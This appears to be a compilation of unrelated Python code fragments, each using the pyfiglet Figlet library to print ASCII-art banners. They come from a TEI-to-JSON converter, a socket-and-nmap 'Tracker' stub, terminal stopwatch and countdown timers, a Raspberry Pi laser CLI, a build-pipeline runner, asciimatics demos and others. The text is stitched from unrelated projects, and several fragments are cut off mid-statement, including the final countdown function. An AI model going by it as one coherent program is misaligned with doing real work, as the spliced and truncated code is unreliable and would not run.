def main(): parser = set_up_argparser() args = parser.parse_args() outputname = str(args.inputdir) # Generate list of TEI XML file paths in given input directory teis = all_teis(args.inputdir) # Generate list of CTS XML file paths in given input directory cts = all_cts(args.inputdir) f = Figlet(font='slant') print(f.renderText('TEI 2 JSON')) # Parse TEI XML into list using multi-threading pool = Pool() print(Fore.CYAN + "✓ Starting TEI parsing" + Style.RESET_ALL) csv_entries_tei = pool.map(tei_to_csv_entry, teis) print(Fore.GREEN + "✓ Completed TEI parsing" + Style.RESET_ALL) # Parse CTS XML into list using multi-threading pool_cts = Pool() print(Fore.GREEN + "✓ Starting CTS parsing" + Style.RESET_ALL) csv_entries_cts = pool_cts.map(cts_to_csv_entry, cts) print(Fore.GREEN + "✓ Completed CTS metadata parsing" + Style.RESET_ALL) # Create Pandas dataframe with TEI list data df_tei = pd.DataFrame(csv_entries_tei, columns=[ 'filename', 'filepath', 'PTA', 'CPG', 'BHGn', 'aldama', 'pinakes', 'date', 'title', 'text', 'licence', 'revision_date', 'revision_author' ]) print(Fore.CYAN + "✓ Created Pandas dataframe for TEI data" + Style.RESET_ALL) # Create Pandas dataframe with CTS list data df_cts = pd.DataFrame(csv_entries_cts, columns=['filepath', 'urn', 'textgroup']) print(Fore.CYAN + "✓ Created Pandas dataframe for CTS metadata" + Style.RESET_ALL) # Merge TEI and CTS dataframes try: df_results = pd.merge(df_tei, df_cts) except: print(Fore.RED + "Error merging TEI and CTS dataframes" + Style.RESET_ALL) else: pass # Generate CSV from list data try: df_results.to_csv("output/%s.csv" % outputname, index=False) except: print(Fore.RED + "Error creating CSV output file" + Style.RESET_ALL) else: print( Fore.CYAN + "✓ Generated output CSV file: 'output/%s.csv'" % outputname, Style.RESET_ALL) # Generate JSON from list data try: json = df_results.to_json(orient='index') open("output/%s.json" % outputname, "w").write(json) except: print(Fore.RED + "Error creating JSON output file" + Style.RESET_ALL) else: print(Fore.CYAN + "✓ Generated output JSON file: 'output/%s.json'" % outputname + Style.RESET_ALL)
import socket import pyfiglet import os import sys import nmap import time from pyfiglet import Figlet from datetime import datetime from urllib import request as urlrequests custom_fig = Figlet(font='graffiti') ascii_banner = pyfiglet.figlet_format("Tracker") print(ascii_banner) print("=================================By-547y4m") def tracker(): soc = socket.socket() Sc = nmap.PortScanner() print("[$]----Session started---->") ip = input("[?]Enter your I.P to Listen on: ") try: host = ip port = 80 soc.bind((host, 80)) print("[+] Listening on " + ip + "....") except: sys.exit("[!]I.P Busy or any other network issue")
from pyfiglet import Figlet custom_fig = Figlet(font='starwars') print(custom_fig.renderText('HACKING NASA'))
def stopwatch(stdscr, alt_format=False, critical=3, exec_cmd=None, font=DEFAULT_FONT, no_figlet=False, no_seconds=False, quit_after=None, title=None, outfile=None, no_window_title=False, time=False, time_format=None, voice_prefix=None, **kwargs): curses_lock, input_queue, quit_event = setup(stdscr) figlet = Figlet(font=font) if title and not no_figlet: try: title = figlet.renderText(title) except CharNotPrinted: title = "" input_thread = Thread( args=(stdscr, input_queue, quit_event, curses_lock), target=input_thread_body, ) input_thread.start() try: sync_start = datetime.now() pause_start = None seconds_elapsed = 0 laps = [] while quit_after is None or seconds_elapsed < int(quit_after): figlet.width = stdscr.getmaxyx()[1] if time: stopwatch_text = datetime.now().strftime(time_format) elif alt_format: stopwatch_text = format_seconds_alt(seconds_elapsed, 0, hide_seconds=no_seconds) else: stopwatch_text = format_seconds(seconds_elapsed, hide_seconds=no_seconds) with curses_lock: if not no_window_title: os.write(stdout.fileno(), "\033]2;{0}\007".format(stopwatch_text).encode()) if outfile: with open(outfile, 'w') as f: f.write("{}\n{}\n".format(stopwatch_text, seconds_elapsed)) stdscr.erase() try: draw_text( stdscr, stopwatch_text if no_figlet else figlet.renderText(stopwatch_text), fallback=stopwatch_text, title=title, ) except CharNotPrinted: draw_text(stdscr, "E") if exec_cmd: voice_prefix = voice_prefix or "" annunciation = "" if seconds_elapsed <= critical and seconds_elapsed > 0: annunciation = str(seconds_elapsed) elif seconds_elapsed in (5, 10, 20, 30, 40, 50, 60): annunciation = "{} {} seconds".format( voice_prefix, seconds_elapsed) elif seconds_elapsed in (120, 180, 300, 600, 1800): annunciation = "{} {} minutes".format( voice_prefix, int(seconds_elapsed / 60)) elif seconds_elapsed == 3600: annunciation = "{} one hour".format(voice_prefix) elif seconds_elapsed % 3600 == 0 and seconds_elapsed > 0: annunciation = "{} {} hours".format( voice_prefix, int(seconds_elapsed / 3600)) Popen( exec_cmd.format(seconds_elapsed, annunciation), stdout=DEVNULL, stderr=STDOUT, shell=True, ) sleep_target = sync_start + timedelta(seconds=seconds_elapsed + 1) if time: sleep_target = sleep_target.replace(microsecond=0) now = datetime.now() if sleep_target > now: try: input_action = input_queue.get(True, (sleep_target - now).total_seconds()) except Empty: input_action = None if input_action == INPUT_PAUSE: pause_start = datetime.now() with curses_lock: if not no_window_title: os.write( stdout.fileno(), "\033]2;{0}\007".format( stopwatch_text).encode()) if outfile: with open(outfile, 'w') as f: f.write("{}\n{}\n".format( stopwatch_text, seconds_elapsed)) stdscr.erase() try: draw_text( stdscr, stopwatch_text if no_figlet else figlet.renderText(stopwatch_text), color=3, fallback=stopwatch_text, title=title, ) except CharNotPrinted: draw_text(stdscr, "E") input_action = input_queue.get() if input_action == INPUT_PAUSE: sync_start += (datetime.now() - pause_start) pause_start = None if input_action == INPUT_EXIT: # no elif here! input_action may have changed if pause_start: sync_start += (datetime.now() - pause_start) pause_start = None break elif input_action == INPUT_RESET: sync_start = datetime.now() laps = [] seconds_elapsed = 0 elif input_action == INPUT_PLUS: sync_start -= timedelta(seconds=10) elif input_action == INPUT_LAP: if pause_start: sync_start += (datetime.now() - pause_start) pause_start = None laps.append((datetime.now() - sync_start).total_seconds()) sync_start = datetime.now() seconds_elapsed = 0 seconds_elapsed = int( (datetime.now() - sync_start).total_seconds()) finally: with curses_lock: if not no_window_title: os.write(stdout.fileno(), "\033]2;\007".encode()) if outfile: os.remove(outfile) quit_event.set() input_thread.join() return (datetime.now() - sync_start).total_seconds(), laps
}, { 'name': 'Exit Program' }] } strategy_answer = prompt(strategy_questions) if strategy_answer.get( 'strategy_type') == 'Vigilant Asset Allocation (VAA)': vaa = VAA() decision = vaa.decision() print_output(decision) elif strategy_answer.get( 'strategy_type') == 'Lethargic Asset Allocation (LAA)': print_output(LAA.decision()) elif strategy_answer.get('strategy_type') == 'Go to Main Menu': break elif strategy_answer.get('strategy_type') == 'Exit Program': quit() main_menu() if __name__ == "__main__": os.system("clear") fig = Figlet(font='slant') print(fig.renderText("PyQuant")) main_menu()
from pyfiglet import Figlet import os from flask import Flask, jsonify from flask_restful import Resource, Api app = Flask(__name__) api = Api(app) font = Figlet(font="starwars") class CreateUser(Resource): def get(self): return {'status': 'success'} api.add_resource(CreateUser, '/user') @app.route("/") def main(): # get the message from the environmental variable $MESSAGE # or fall back to the string "no message specified" message = os.getenv("MESSAGE", "no message specified") # render plain text nicely in HTML html_text = font.renderText(message)\ .replace(" "," ")\ .replace(">",">")\ .replace("<","<")\ .replace("\n","<br>") # use a monospace font so everything lines up as expected
_ = system('clear') # Styles style = style_from_dict({ Token.Separator: '#cc5454', Token.QuestionMark: '#673ab7 bold', Token.Selected: '#cc5454', # default Token.Pointer: '#673ab7 bold', Token.Instruction: '', # default Token.Answer: '#f44336 bold', Token.Question: 'bold #673ab7', }) # Titulo title = Figlet(font='slant') # Actions main_menu_actions = [ "Use a especific address", "Use a excel or a csv file", ] excel_files = glob.glob('*.xlsx') csv_files = glob.glob('*.csv') # Menu main_menu = [{ "type": "list", "message": "Menu", "name": "action", "choices": main_menu_actions + [Separator(), "Cerrar"] }] # Address
if isinstance(obj, np.integer): return int(obj) elif isinstance(obj, np.floating): return float(obj) elif isinstance(obj, np.ndarray): return obj.tolist() else: return super(NpEncoder, self).default(obj) def read_yaml(filename): ''' take filename as parameter and convert yaml to ordereddict ''' return yaml.load(open(filename)) custom_fig = Figlet(font='slant') click.echo(custom_fig.renderText('cognito')) @click.group(cls=DefaultGroup, default='--help', default_if_no_args=True, invoke_without_command=True) @click.option('--version', '-v', is_flag=True, default=False) def cli(version): ''' Generate ML consumable datasets using advanced data preprocessing and data wrangling. USAGE: \n $ cognito prepare -m ml --input filepath --out filepath
import time from pyfiglet import Figlet from getpass import getpass import new_token fig_type = Figlet(font='graffiti') print(fig_type.renderText('Token Manager')) # Script Menu print('\n[1] New Token \n' '[2] Edit Token \n' '[3] Delete Token \n' '[4] Exit\n\n\n') user_selection = input('[?] What Type Of Service Are You Looking For ? ') if user_selection == '1': print("Starting New Token Configurations ...") gather_token = new_token.get_token() elif user_selection == '2': print("Starting Tokens Data Edit Mode...") elif user_selection == '3': print("Fetching Tokens List and Data ...") exit() elif user_selection == '4': print("Exiting The Store ...") exit()
class ScALP(cmd.Cmd): custom_fig = Figlet(font='slant') intro = 'Welcome to the ScALP CLI for Raspberry Pi \n' prompt = '> ' file = None print(custom_fig.renderText(' ScALP ')) def do_background(self, arg): scalp_bg = bg.Background() scalp_bg.set_background() def do_frame(self, arg): scalp_fr = fr.Frame() scalp_fr.set_frame() def do_xy(self, arg): """ For each frame in background and foreground, subtract, Canny edge detection, find contours, get x-y """ back = cv2.VideoCapture('./background_video.avi') fore = cv2.VideoCapture('./foreground_video.avi') back_frames = [] fore_frames = [] diff_frames = [] for i in range(60): _, back_frame = back.read() _, fore_frame = fore.read() back_gray = cv2.cvtColor(back_frame, cv2.COLOR_BGR2GRAY) fore_gray = cv2.cvtColor(fore_frame, cv2.COLOR_BGR2GRAY) back_frames.append(back_gray) fore_frames.append(fore_gray) threshold = 40 for i in range(0, 5): print("frame: " + str(i)) f_frame = fore_frames[i] b_frame = back_frames[i] diff_frame = np.zeros(shape=(720, 1280)) for x in range(0, 720): for y in range(0, 1280): pixel = int(f_frame[x, y]) - int(b_frame[x, y]) if abs(pixel) > threshold: diff_frame[x, y] = 1 diff_frames.append(diff_frame) avg_img = np.mean(diff_frames, axis=0) labeled_image, nb_labels = ndimage.label(diff_frames[-1], structure=np.ones((3, 3))) sizes = ndimage.sum(diff_frames[-1], labeled_image, range(nb_labels + 1)) sizes = list(sizes) main_label = max(sizes) res_list = [i for i, value in enumerate(sizes) if value == main_label] main_label = res_list[0] for x in range(0, 720): for y in range(0, 1280): if labeled_image[x, y] != main_label: labeled_image[x, y] = 0 else: labeled_image[x, y] = 255 cv2.imwrite('./labels.jpg', labeled_image) image_bw = ndimage.binary_fill_holes(labeled_image).astype(int) cv2.imwrite('./label_bw_filled_in.jpg', image_bw) # while True: # cv2.imshow('Gray image', diff_frames[-1]) # k = cv2.waitKey(33) # if k==27: # Esc key to stop # break cv2.destroyAllWindows() def do_xyRGB(self, arg): """ Similar to do_xy but looks at whole RGB """ back = cv2.VideoCapture('./background_video.avi') fore = cv2.VideoCapture('./foreground_video.avi') back_frames = [] fore_frames = [] diff_frames = [] for i in range(60): _, back_frame = back.read() _, fore_frame = fore.read() back_frames.append(back_frame) fore_frames.append(fore_frame) threshold = 110 for i in range(0, 5): print("frame: " + str(i)) f_frame = fore_frames[i] b_frame = back_frames[i] diff_frame = np.zeros(shape=(720, 1280)) for x in range(0, 720): for y in range(0, 1280): red_pixel = abs( int(f_frame[x, y][0]) - int(b_frame[x, y][0])) green_pixel = abs( int(f_frame[x, y][1]) - int(b_frame[x, y][1])) blue_pixel = abs( int(f_frame[x, y][2]) - int(b_frame[x, y][2])) pixel_diff = red_pixel + green_pixel + blue_pixel if abs(pixel_diff) > threshold: diff_frame[x, y] = 255 diff_frames.append(diff_frame) cv2.imwrite('./diff_frame.jpg', diff_frames[0]) labeled_image, nb_labels = ndimage.label(diff_frames[-1], structure=np.ones((3, 3))) sizes = ndimage.sum(diff_frames[-1], labeled_image, range(nb_labels + 1)) sizes = list(sizes) main_label = max(sizes) res_list = [i for i, value in enumerate(sizes) if value == main_label] main_label = res_list[0] for x in range(0, 720): for y in range(0, 1280): if labeled_image[x, y] != main_label: labeled_image[x, y] = 0 else: labeled_image[x, y] = 255 cv2.imwrite('./labels_RGB.jpg', labeled_image) image_bw = ndimage.binary_fill_holes(labeled_image).astype(int) cv2.imwrite('./label_bw_filled_in_RGB.jpg', image_bw) cv2.destroyAllWindows() def do_drivexy(self, arg): """ Drives the digital signal to send the laser to a specific point. Can be called <=800 times a second. Uses a list of x and y points. """ for i in range(100, 4000, 100): val = int(i) + 4096 binary_val = f"{val:016b}" hex1 = hex(int(binary_val[0:8], 2)) hex2 = hex(int(binary_val[8:16], 2)) hex1 = int(hex1, 16) hex2 = int(hex2, 16) spi1.writebytes([hex1, hex2]) spi2.writebytes([hex1, hex2]) time.sleep(0.005) for i in range(4000, 100, -100): val = int(i) + 4096 binary_val = f'{val:016b}' hex1 = hex(int(binary_val[0:8], 2)) hex2 = hex(int(binary_val[8:16], 2)) hex1 = int(hex1, 16) hex2 = int(hex2, 16) spi1.writebytes([hex1, hex2]) spi2.writebytes([hex1, hex2]) time.sleep(0.005) def do_circle(self, arg): """ Drives motor to make a circle """ points = 100 angles = np.linspace(0, 2 * 3.14159, points) input_x = input("Provide center x (int): ") input_y = input("Provide center y (int): ") x = float(input_x) y = float(input_y) input_radius = input("Provide radius (int less than 1000): ") angles = [float(i) for i in list(angles)] input_radius = float(input_radius) x = [round(input_radius * np.cos(angle)) + x for angle in angles] y = [round(input_radius * np.sin(angle)) + y for angle in angles] while True: for count, point in enumerate(x, 0): x_val = int(x[count]) + 4096 x_b_val = f'{x_val:016b}' hex1 = hex(int(x_b_val[0:8], 2)) hex2 = hex(int(x_b_val[8:16], 2)) hex1 = int(hex1, 16) hex2 = int(hex2, 16) spi1.writebytes([hex1, hex2]) y_val = int(y[count]) + 36864 y_b_val = f'{y_val:016b}' hex1 = hex(int(y_b_val[0:8], 2)) hex2 = hex(int(y_b_val[8:16], 2)) hex1 = int(hex1, 16) hex2 = int(hex2, 16) spi1.writebytes([hex1, hex2]) def do_information(self, arg): """ Get info on an image """ frame = cv2.imread('./whitestar.jpg', cv2.IMREAD_GRAYSCALE) scale_percent = 30 # percent of original size width = int(frame.shape[1] * scale_percent / 100) height = int(frame.shape[0] * scale_percent / 100) dim = (width, height) frame = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA) contours = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) print(type(contours[1])) points = np.vstack(contours[1]) # print(points) print(points[0]) print("Number of Contours found = " + str(len(contours))) # cv2.drawContours(frame, contours[0], -1, (0, 255, 0), 3) # cv2.imshow('Contours', contours[0]) # cv2.waitKey(0) # x = [float(i[0][0])*2 for i in points] # y = [float(i[0][1])*2 for i in points] x = list(range(0, 1000, 100)) + [1000] * 10 + list(range( 1000, 0, -100)) + [0] * 10 y = [0] * 10 + list(range(0, 1000, 100)) + [1000] * 10 + list( range(1000, 0, -100)) print(x) print(y) cv2.destroyAllWindows() while True: for count, point in enumerate(x, 0): x_val = int(x[count]) + 4096 x_b_val = f'{x_val:016b}' hex1 = hex(int(x_b_val[0:8], 2)) hex2 = hex(int(x_b_val[8:16], 2)) hex1 = int(hex1, 16) hex2 = int(hex2, 16) spi1.writebytes([hex1, hex2]) y_val = int(y[count]) + 36864 y_b_val = f'{y_val:016b}' hex1 = hex(int(y_b_val[0:8], 2)) hex2 = hex(int(y_b_val[8:16], 2)) hex1 = int(hex1, 16) hex2 = int(hex2, 16) spi1.writebytes([hex1, hex2]) def do_image(self, arg): """ reads image, creates point list """ img = cv2.imread("./whitestar.jpg", cv2.IMREAD_UNCHANGED) img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) cv2.imshow("example", img_grey) thresh = 100 ret, thresh_img = cv2.threshold(img_grey, thresh, 255, cv2.THRESH_BINARY) contours = cv2.findContours(thresh_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) img_contours = np.zeros(img.shape) contour_points = contours[1] #cv2.drawContours(img_contours, contours[1], -1, (0,255,0), 3) #cv2.imwrite("./contours.png", img_contours) # Now find equally spaced points along contours[1] xs = [] ys = [] print(contour_points) print(contour_points[0]) for i in contour_points[0]: xs.append(i[0][0]) ys.append(i[0][1]) plt.figure(0) plt.scatter(ys, xs) plt.show() plt.close() # closed contour from xc to yc xc = xs + [xs[0]] yc = ys + [ys[0]] # find spacing between points dx = np.diff(xc) dy = np.diff(yc) dS = np.sqrt(dx * dx + dy * dy) print(dS) dS = [0] + list(dS) d = np.cumsum(dS) perimeter = d[-1] N = 50 ds = perimeter / N dSi = [ds * i for i in range(0, N)] xi = np.interp(dSi, d, xc) yi = np.interp(dSi, d, yc) plt.figure(1) plt.scatter(yi, xi) plt.show() plt.close() x = [i * 3 for i in xi] y = [j * 3 for j in yi] while True: for count, point in enumerate(x, 0): x_val = int(x[count]) + 4096 x_b_val = f'{x_val:016b}' hex1 = hex(int(x_b_val[0:8], 2)) hex2 = hex(int(x_b_val[8:16], 2)) hex1 = int(hex1, 16) hex2 = int(hex2, 16) spi1.writebytes([hex1, hex2]) y_val = int(y[count]) + 36864 y_b_val = f'{y_val:016b}' hex1 = hex(int(y_b_val[0:8], 2)) hex2 = hex(int(y_b_val[8:16], 2)) hex1 = int(hex1, 16) hex2 = int(hex2, 16) spi1.writebytes([hex1, hex2]) pass def do_colorpick(self, arg): """ Drives the digital signal to achieve the correct RGB color on the white laser """ pass def do_threshold(self, arg): """ Test thresholding to determine outline points """ pass def do_message(self, arg): scalp_ms = ms.Message() scalp_ms.get_message() def do_bye(self, arg): """ Stop command line interface """ print('thanks for using scalp') self.close() return True def close(self): if self.file: self.file.close() self.file = None
def start_build(): f = Figlet(font='standard') print(f.renderText("BuildIt4me!")) define_cli_args() if args.debug: print("*** DEBUG MODE ***") print(f"-> Pipeline '{ args.pipeline_name }' has started!") try: # The temp directory for the cloned repo is only kept inside the below "with" scope with tempfile.TemporaryDirectory() as tmpdirname: print('-> Creating temporary directory', tmpdirname) print("-> Checking out from SCM") print( f"-> Cloning { args.git_repo } into temp dir '{ tmpdirname }'") # get the instance of the git object while cloning the remote repo # https://gitpython.readthedocs.io/en/stable/reference.html#module-git.remote git_repo = Repo.clone_from(args.git_repo, tmpdirname, branch='master', progress=CloneProgress()) # retrieve the branch where the build should run from build_branch = parse_and_return_pipeline_yaml(tmpdirname)["branch"] # return the defined tasks from the parsed yaml file tasks = parse_and_return_pipeline_yaml(tmpdirname)["tasks"] # return the defined pipelines from the parsed yaml file pipelines = parse_and_return_pipeline_yaml(tmpdirname)["pipelines"] # if DEBUG global variable is set to True, print parsed complex data strucure for tasks and pipelines if args.debug: print("[DEBUG] - Tasks Data Structure:", tasks) print("[DEBUG] - Pipelines Data Structure:", pipelines) print("\nBuild from branch:", build_branch) # checks out local git branch git_repo.git.checkout(build_branch) # checks if the provided pipeline is valid if is_valid_pipeline(args.pipeline_name, pipelines): # iterate through all dictionaries represented by {'pipeline_name': ['task1', 'task2']} for pipeline_dict in pipelines: # split the dictionary between pipeline_name and its corresponding tasks list for pipeline_key, pipeline_value in pipeline_dict.items(): # checks if the current pipeline name matches the provided pipeline if pipeline_key == args.pipeline_name: # iterate through every task from the tasks list for pipeline_task in pipeline_value: print( f"\n*** { pipeline_task.capitalize() } ***" ) # checks if the current task is valid, # grabs its corresponding command from the tasks list # then the command is executed in the Shell subprocess module if is_valid_task(pipeline_task, tasks): print( " CMD:", return_task_cmd(pipeline_task, tasks)) cmd_call = subprocess.call(return_task_cmd( pipeline_task, tasks), shell=True, cwd=tmpdirname) # if the subprocess exit code is other than 0 raise an error if cmd_call: raise ValueError( "Provided CMD doesn't work. Subprocess returned with error", cmd_call) else: raise ValueError( f"The task '{ pipeline_task }' doesn't seem to be a valid task. Check your pipeline manifest and try again." ) else: raise ValueError( f"'{ args.pipeline_name }' doesn't seem to be a valid pipeline. Check your pipeline manifest and try again." ) # just announcing the temp dir removal, since it's going to be removed by the end of the 'with' block lifecycle print("\n-> Post run housekeeping: Removing temporary directory", tmpdirname) print("\nThe pipeline finished without any errors!\n") except OSError as err: print("Couldn't create temporary directory in local file system:", err) print("Error code:", err.errno)
def demo(screen): scenes = [] effects = [ Print(screen, Fire(screen.height, 80, "*" * 70, 0.8, 60, screen.colours, bg=screen.colours >= 256), 0, speed=1, transparent=False), Print(screen, FigletText("PYTHON", "banner3"), (screen.height - 4) // 2, colour=Screen.COLOUR_BLACK, speed=1, stop_frame=30), Print(screen, FigletText("ROCKS", "banner3"), (screen.height - 4) // 2, colour=Screen.COLOUR_BLACK, speed=1, start_frame=30, stop_frame=50), Print(screen, FigletText("!!!", "banner3"), (screen.height - 4) // 2, colour=Screen.COLOUR_BLACK, speed=1, start_frame=50, stop_frame=70), Print(screen, FigletText("!!!", "banner3"), (screen.height - 4) // 2, colour=Screen.COLOUR_BLACK, speed=1, start_frame=70), ] scenes.append(Scene(effects, 100)) text = Figlet(font="banner", width=200).renderText("ASCIIMATICS") width = max([len(x) for x in text.split("\n")]) effects = [ Print(screen, Fire(screen.height, 80, text, 0.4, 40, screen.colours), 0, speed=1, transparent=False), Print(screen, FigletText("ASCIIMATICS", "banner"), screen.height - 9, x=(screen.width - width) // 2 + 1, colour=Screen.COLOUR_BLACK, bg=Screen.COLOUR_BLACK, speed=1), Print(screen, FigletText("ASCIIMATICS", "banner"), screen.height - 9, colour=Screen.COLOUR_WHITE, bg=Screen.COLOUR_WHITE, speed=1), ] scenes.append(Scene(effects, -1)) screen.play(scenes, stop_on_resize=True)
def _credits(screen): scenes = [] text = Figlet(font="banner", width=200).renderText("ASCIIMATICS") width = max([len(x) for x in text.split("\n")]) effects = [ Print(screen, Fire(screen.height, 80, text, 0.4, 40, screen.colours), 0, speed=1, transparent=False), Print(screen, FigletText("ASCIIMATICS", "banner"), screen.height - 9, x=(screen.width - width) // 2 + 1, colour=Screen.COLOUR_BLACK, bg=Screen.COLOUR_BLACK, speed=1), Print(screen, FigletText("ASCIIMATICS", "banner"), screen.height - 9, colour=Screen.COLOUR_WHITE, bg=Screen.COLOUR_WHITE, speed=1), ] scenes.append(Scene(effects, 100)) effects = [ Matrix(screen, stop_frame=200), Mirage(screen, FigletText("Asciimatics"), screen.height // 2 - 3, Screen.COLOUR_GREEN, start_frame=100, stop_frame=200), Wipe(screen, start_frame=150), Cycle(screen, FigletText("Asciimatics"), screen.height // 2 - 3, start_frame=200) ] scenes.append(Scene(effects, 250, clear=False)) effects = [ BannerText( screen, Rainbow( screen, FigletText("Reliving the 80s in glorious ASCII text...", font='slant')), screen.height // 2 - 3, Screen.COLOUR_GREEN) ] scenes.append(Scene(effects)) effects = [ Scroll(screen, 3), Mirage(screen, FigletText("Conceived and"), screen.height, Screen.COLOUR_GREEN), Mirage(screen, FigletText("written by:"), screen.height + 8, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Peter Brittain"), screen.height + 16, Screen.COLOUR_GREEN) ] scenes.append(Scene(effects, (screen.height + 24) * 3)) effects = [ Scroll(screen, 3), Mirage(screen, FigletText("With help from:"), screen.height, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Cory Benfield"), screen.height + 8, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Bryce Guinta"), screen.height + 16, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Aman Orazaev"), screen.height + 24, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Daniel Kerr"), screen.height + 32, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Dylan Janeke"), screen.height + 40, Screen.COLOUR_GREEN), Mirage(screen, FigletText("ianadeem"), screen.height + 48, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Scott Mudge"), screen.height + 56, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Luke Murphy"), screen.height + 64, Screen.COLOUR_GREEN), Mirage(screen, FigletText("mronkain"), screen.height + 72, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Dougal Sutherland"), screen.height + 80, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Kirtan Sakariya"), screen.height + 88, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Jesse Lieberg"), screen.height + 96, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Erik Doffagne"), screen.height + 104, Screen.COLOUR_GREEN), Mirage(screen, FigletText("Noah Ginsburg"), screen.height + 112, Screen.COLOUR_GREEN) ] scenes.append(Scene(effects, (screen.height + 120) * 3)) effects = [ Cycle(screen, FigletText("ASCIIMATICS", font='big'), screen.height // 2 - 8, stop_frame=100), Cycle(screen, FigletText("ROCKS!", font='big'), screen.height // 2 + 3, stop_frame=100), Stars(screen, (screen.width + screen.height) // 2, stop_frame=100), DropScreen(screen, 100, start_frame=100) ] scenes.append(Scene(effects, 200)) effects = [ Print(screen, SpeechBubble("Press 'X' to exit."), screen.height // 2 - 1, attr=Screen.A_BOLD) ] scenes.append(Scene(effects, -1)) screen.play(scenes, stop_on_resize=True)
def banner_generate(): f = Figlet(font='slant') return f.renderText('MicroPyFW')
def cli(): f = Figlet(font='slant') print(f.renderText('M y c a r t'))
def print_header(): """Why not. """ f = Figlet(font='big') print f.renderText('HackMiner') print "Version 0.2.1"
from pyfiglet import Figlet from termcolor import colored, COLORS text = input("What message do you want to print? ") color = input("What color? ") if color not in COLORS.keys(): color = 'white' # this is a really long comment that probably should be set over a couple # of lines and cleaned up. print(colored(Figlet().renderText(text), color))
from pyfiglet import Figlet import random from midiutil import MIDIFile import simpleaudio as sa import time print("\n------------------------------------------------------------------------------\n") #welcome font name_sign = Figlet(font='slant') print(name_sign.renderText('Irr Beat Gen V.1')) print("\n------------------------------------------------------------------------------\n") #input from user for time signature, does not accept invalid input while True: try: time_sig = input("Please enter a time signature like so: number/number\nThe second number can only be a 2, 4 or 8\n\n") or "7/8" time_sig_list = time_sig.split("/") time_sig1 = int(time_sig_list[0]) time_sig2 = int(time_sig_list[1]) except ValueError: print("\nYou can only enter (whole) numbers!\n") continue except IndexError: print("\nYou need to enter two numbers!\n") continue else: if time_sig1 == 0 or time_sig1 < 0: print("\nPlease enter a number higher than 0!\n") continue elif time_sig1 > 16:
def print_logo(text_logo): figlet = Figlet(font='slant') print(figlet.renderText(text_logo))
def show_app_title(): print(Figlet().renderText(config.yanom_globals.app_name)) f = Figlet(font='slant') print(f.renderText(config.yanom_globals.app_sub_name)) print(f"YANOM ver {config.yanom_globals.version}")
def countdown(stdscr, alt_format=False, font=DEFAULT_FONT, blink=False, critical=3, quit_after=None, text=None, timespec=None, title=None, voice=None, voice_prefix=None, exec_cmd=None, outfile=None, no_bell=False, no_seconds=False, no_text_magic=True, no_figlet=False, no_window_title=False, time=False, time_format=None, **kwargs): try: sync_start, target = parse_timestr(timespec) except ValueError: raise click.BadParameter( "Unable to parse TIME value '{}'".format(timespec)) curses_lock, input_queue, quit_event = setup(stdscr) figlet = Figlet(font=font) if title and not no_figlet: try: title = figlet.renderText(title) except CharNotPrinted: title = "" voice_cmd = None if voice: for cmd in ("/usr/bin/say", "/usr/bin/espeak"): if os.path.exists(cmd): voice_cmd = cmd break if voice or exec_cmd: voice_prefix = voice_prefix or "" input_thread = Thread( args=(stdscr, input_queue, quit_event, curses_lock), target=input_thread_body, ) input_thread.start() seconds_total = seconds_left = int( ceil((target - datetime.now()).total_seconds())) try: while seconds_left > 0 or blink or text: figlet.width = stdscr.getmaxyx()[1] if time: countdown_text = datetime.now().strftime(time_format) elif alt_format: countdown_text = format_seconds_alt(seconds_left, seconds_total, hide_seconds=no_seconds) else: countdown_text = format_seconds(seconds_left, hide_seconds=no_seconds) if seconds_left > 0: with curses_lock: if not no_window_title: os.write( stdout.fileno(), "\033]2;{0}\007".format(countdown_text).encode()) if outfile: with open(outfile, 'w') as f: f.write("{}\n{}\n".format(countdown_text, seconds_left)) stdscr.erase() try: draw_text( stdscr, countdown_text if no_figlet else figlet.renderText(countdown_text), color=1 if seconds_left <= critical else 0, fallback=title + "\n" + countdown_text if title else countdown_text, title=title, ) except CharNotPrinted: draw_text(stdscr, "E") annunciation = None if seconds_left <= critical: annunciation = str(seconds_left) elif seconds_left in (5, 10, 20, 30, 60): annunciation = "{} {} seconds".format(voice_prefix, seconds_left) elif seconds_left in (300, 600, 1800): annunciation = "{} {} minutes".format(voice_prefix, int(seconds_left / 60)) elif seconds_left == 3600: annunciation = "{} one hour".format(voice_prefix) if annunciation or exec_cmd: if exec_cmd: Popen( exec_cmd.format(seconds_left, annunciation or ""), stdout=DEVNULL, stderr=STDOUT, shell=True, ) if voice_cmd: Popen( [voice_cmd, "-v", voice, annunciation.strip()], stdout=DEVNULL, stderr=STDOUT, ) # We want to sleep until this point of time has been # reached: sleep_target = sync_start + timedelta(seconds=1) if time: sleep_target = sleep_target.replace(microsecond=0) # If sync_start has microsecond=0, it might happen that we # need to skip one frame (the very first one). This occurs # when the program has been startet at, say, # "2014-05-29 20:27:57.930651". Now suppose rendering the # frame took about 0.2 seconds. The real time now is # "2014-05-29 20:27:58.130000" and sleep_target is # "2014-05-29 20:27:58.000000" which is in the past! We're # already too late. We could either skip that frame # completely or we can draw it right now. I chose to do the # latter: Only sleep if haven't already missed our target. now = datetime.now() if sleep_target > now and seconds_left > 0: try: input_action = input_queue.get(True, (sleep_target - now).total_seconds()) except Empty: input_action = None if input_action == INPUT_PAUSE: pause_start = datetime.now() with curses_lock: stdscr.erase() try: draw_text( stdscr, countdown_text if no_figlet else figlet.renderText(countdown_text), color=3, fallback=countdown_text, title=title, ) except CharNotPrinted: draw_text(stdscr, "E") input_action = input_queue.get() if input_action == INPUT_PAUSE: time_paused = datetime.now() - pause_start sync_start += time_paused target += time_paused if input_action == INPUT_EXIT: # no elif here! input_action may have changed break elif input_action == INPUT_RESET: sync_start, target = parse_timestr(timespec) seconds_left = int( ceil((target - 